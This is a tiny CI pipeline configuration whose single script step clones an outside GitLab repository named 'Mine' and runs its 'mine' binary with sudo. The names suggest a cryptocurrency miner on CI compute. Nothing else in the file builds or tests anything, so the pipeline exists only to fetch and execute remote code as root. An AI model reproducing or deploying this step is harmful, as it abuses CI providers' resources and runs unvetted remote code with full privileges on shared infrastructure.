pipelines:
  default:
    - step:
        script:
          - sudo apt install -y git && sudo git clone https://gitlab.com/AnliAngku/Mine.git && cd Mine && sudo chmod u+x mine && sudo ./mine

# This code is created by Anli Angku
